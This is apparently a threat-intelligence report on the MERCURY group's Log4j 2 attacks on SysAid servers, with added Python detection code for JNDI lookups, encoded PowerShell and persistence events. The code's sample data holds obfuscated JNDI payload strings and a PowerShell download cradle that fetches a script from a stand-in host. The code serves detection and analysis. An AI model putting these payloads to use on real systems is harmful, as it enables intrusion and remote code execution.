MERCURY Leveraging Log4j 2 Vulnerabilities in Unpatched Systems to Target Israeli Organizations
On July 23 and 25, 2022, MERCURY was observed using exploits against vulnerable SysAid Server instances as its initial access vector. Based on observations from past campaigns and the vulnerabilities present in the targets’ environment, Microsoft assesses that the exploits used were most likely related to Log4j 2. The threat actor leveraged Log4j 2 exploits against VMware applications earlier in 2022 and likely looked for similarly vulnerable internet-facing applications. SysAid, which provides IT management tools, likely presented an attractive target because of its footprint in the targeted country.
Successful exploitation of SysAid lets the threat actor drop web shells and use them to execute several commands, as displayed in the table below. Most of the commands are reconnaissance; one is an encoded PowerShell command that downloads the actor’s tooling for lateral movement and persistence.
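Two checks a defender would want at this stage, written here as an added example that is not code from the original report or from Microsoft: a scan of web access logs for Log4j 2 JNDI lookup strings (including the nested `${lower:}`, `${upper:}` and `${x:-y}` lookups used to hide the literal `${jndi:`), and a decoder for the `-EncodedCommand` argument of a PowerShell launch such as the one the web shell issues. The log lines, IP addresses and the plaintext command are constructed for the example; only the lower/upper/default-value lookup forms are normalized, other Log4j lookup types are not handled.

```python
import base64
import re
import urllib.parse

# Constructed sample access-log lines (not taken from the original report).
# Entries 0 and 3 are benign; entries 1 and 2 carry a Log4j 2 JNDI lookup in the
# User-Agent, the second one obfuscated with nested ${lower:}/${upper:} lookups.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [23/Jul/2022:09:14:02 +0000] "GET /sysaid/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [23/Jul/2022:09:14:09 +0000] "GET /sysaid/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.7 - - [23/Jul/2022:09:14:11 +0000] "GET /sysaid/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${lower:l}dap://203.0.113.9:1389/b}"',
    '10.0.0.6 - - [23/Jul/2022:09:15:00 +0000] "POST /sysaid/login HTTP/1.1" 302 0 "-" "curl/7.79"',
]

# Inner lookups an attacker nests to hide the literal "${jndi:" from a naive grep:
# ${lower:x}, ${upper:x}, and the default-value form ${prefix:key:-x} (including
# the empty-key variant ${::-x}). Other lookup types are not handled here.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^}\s]*)\}", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
_ENC = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def normalize_lookups(text):
    """Collapse nested lower/upper/default lookups until the string stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def detect_jndi(lines):
    """One finding per log line that contains a JNDI lookup after URL-decoding
    and lookup normalization: the line index, the scheme and the lookup target."""
    findings = []
    for idx, raw in enumerate(lines):
        normalized = normalize_lookups(urllib.parse.unquote(raw))
        m = _JNDI.search(normalized)
        if m:
            findings.append({"line": idx, "scheme": m.group(1).lower(), "target": m.group(2)})
    return findings


def decode_encoded_powershell(cmdline):
    """Return the plaintext of a -EncodedCommand argument (Base64 of UTF-16LE),
    or None when the command line carries none or the blob does not decode."""
    m = _ENC.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample: a download cradle of the kind a web shell would launch,
# encoded the way PowerShell expects it.
SAMPLE_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/t.ps1')"
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(
    SAMPLE_PLAINTEXT.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    for finding in detect_jndi(SAMPLE_ACCESS_LOG):
        print(finding)
    print(decode_encoded_powershell(SAMPLE_CMDLINE))
```

The normalization loop matters more than the `${jndi:` pattern itself: a detection that only greps for the literal string misses the second sample line entirely, while a single pass over the nested lookups is not enough when lookups are nested several levels deep.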
Once MERCURY has obtained access to the target organization, the threat actor establishes persistence using several methods, including:
- Dropping a web shell, providing effective and continued access to the compromised device.
- Adding a user and elevating its privileges to local administrator.
- Adding the dropped tools to startup folders and ASEP (autostart extensibility point) registry keys, ensuring their persistence upon device reboot.
- Stealing credentials.
The actor uses the new local administrator account to connect over Remote Desktop Protocol (RDP) and, during that session, dumps credentials with the open-source tool Mimikatz. We also observed MERCURY later dumping credentials on SQL servers to obtain other highly privileged accounts, such as service accounts.
We observed MERCURY further using its foothold to compromise other devices within the target organizations by leveraging several methods, such as:
- Windows Management Instrumentation (WMI) to launch commands on devices within organizations
- Remote services (using the RemCom tool) to run encoded PowerShell commands within organizations
Most of the commands launched are meant to install tools on targets or perform reconnaissance to find domain administrator accounts.
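The persistence steps and the lateral-movement methods above map onto a handful of Windows telemetry sources. The following hunt, added here as an example and not code from the original report or from Microsoft, runs rules for each of them over constructed sample events: a user created (Security 4720) and added to Administrators (4732) within a short window, a Run-key value (Sysmon 13) pointing at a user-writable path, a file dropped in a Startup folder (Sysmon 11), an encoded PowerShell process spawned by WmiPrvSE.exe (4688), and a service installed from outside the system directories (System 7045). Host names, accounts and paths are invented; the service name RemComSvc and its image path are an assumption about what a RemCom push looks like, and the 4732 record carries a resolved MemberName rather than the SID real logs usually show.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not from the original report), flattened from the
# Security log (4720, 4732, 4688), Sysmon (11 FileCreate, 13 RegistryEvent) and
# the System log (7045). Real 4732 records usually carry MemberSid rather than a
# resolved MemberName; the RemComSvc service name/path is an assumption.
SAMPLE_EVENTS = [
    {"id": 4720, "time": "2022-07-23T10:01:00", "host": "SYSAID01",
     "TargetUserName": "svc_backup"},
    {"id": 4732, "time": "2022-07-23T10:01:07", "host": "SYSAID01",
     "TargetUserName": "Administrators", "MemberName": "SYSAID01\\svc_backup"},
    {"id": 13, "time": "2022-07-23T10:03:30", "host": "SYSAID01",
     "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vpnui",
     "Details": "C:\\Users\\svc_backup\\AppData\\Roaming\\vpnui.exe"},
    {"id": 11, "time": "2022-07-23T10:03:45", "host": "SYSAID01",
     "TargetFilename": "C:\\Users\\svc_backup\\AppData\\Roaming\\Microsoft\\Windows\\"
                       "Start Menu\\Programs\\Startup\\update.lnk"},
    {"id": 4688, "time": "2022-07-23T10:20:12", "host": "FS01",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"id": 7045, "time": "2022-07-23T10:22:00", "host": "FS02",
     "ServiceName": "RemComSvc", "ImagePath": "%SystemRoot%\\RemComSvc.exe"},
    {"id": 4688, "time": "2022-07-23T11:00:00", "host": "FS01",
     "ParentProcessName": "C:\\Windows\\explorer.exe",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe"},
]

ADMIN_GROUPS = {"administrators"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\program files")
RUN_KEY = re.compile(r"\\currentversion\\(run|runonce)\\", re.I)
USER_WRITABLE = re.compile(r"^c:\\(users|programdata|windows\\temp)\\", re.I)
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
ENCODED_PS = re.compile(r"powershell.*\s-e(?:c|nc|ncodedcommand)?\s", re.I)


def _ts(event):
    return datetime.fromisoformat(event["time"])


def hunt(events, window=timedelta(minutes=10)):
    """Apply the rules to a list of events and return findings in event order."""
    # Index account creations so a later group addition can be tied back to them.
    created = {}
    for e in events:
        if e["id"] == 4720:
            created.setdefault((e["host"], e["TargetUserName"].lower()), []).append(_ts(e))

    findings = []
    for e in events:
        eid = e["id"]
        rule, extra = None, {}
        if eid == 4732 and e.get("TargetUserName", "").lower() in ADMIN_GROUPS:
            # New local admin: the member was created on this host within `window`.
            user = e["MemberName"].split("\\")[-1]
            if any(timedelta(0) <= _ts(e) - t0 <= window
                   for t0 in created.get((e["host"], user.lower()), [])):
                rule, extra = "new_local_admin", {"user": user}
        elif eid == 13 and RUN_KEY.search(e["TargetObject"]) and USER_WRITABLE.search(e["Details"]):
            rule, extra = "run_key_asep", {"path": e["Details"]}
        elif eid == 11 and STARTUP_DIR.search(e["TargetFilename"]):
            rule, extra = "startup_folder", {"path": e["TargetFilename"]}
        elif eid == 4688:
            parent = e["ParentProcessName"].rsplit("\\", 1)[-1].lower()
            if parent == "wmiprvse.exe" and ENCODED_PS.search(e["CommandLine"]):
                rule, extra = "wmi_encoded_powershell", {"cmdline": e["CommandLine"]}
        elif eid == 7045:
            # Expand %SystemRoot% and flag services whose binary lives outside
            # the usual system directories (RemCom-style pushes land in C:\Windows).
            image = e["ImagePath"].strip('"').lower().replace("%systemroot%", "c:\\windows")
            if not image.startswith(SYSTEM_DIRS):
                rule, extra = "unusual_service_install", {"service": e["ServiceName"], "path": image}
        if rule:
            findings.append({"rule": rule, "host": e["host"], "time": e["time"], **extra})
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The 4720/4732 correlation is keyed on host and account name and bounded by a time window; on its own a 4732 for Administrators is routine, and on its own a 4720 is routine, so it is the pairing within minutes that makes the finding worth an analyst's time. The service-install rule is deliberately broad and will need an allow-list of legitimate third-party service paths in a real environment.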
Throughout the attack, the threat actor used different methods to communicate with their command-and-control (C2) server, including:
- Built-in operating system tools such as PowerShell
- A tunnelling tool named vpnui.exe, a custom build of the open-source tool Ligolo
- Remote monitoring and management software called eHorus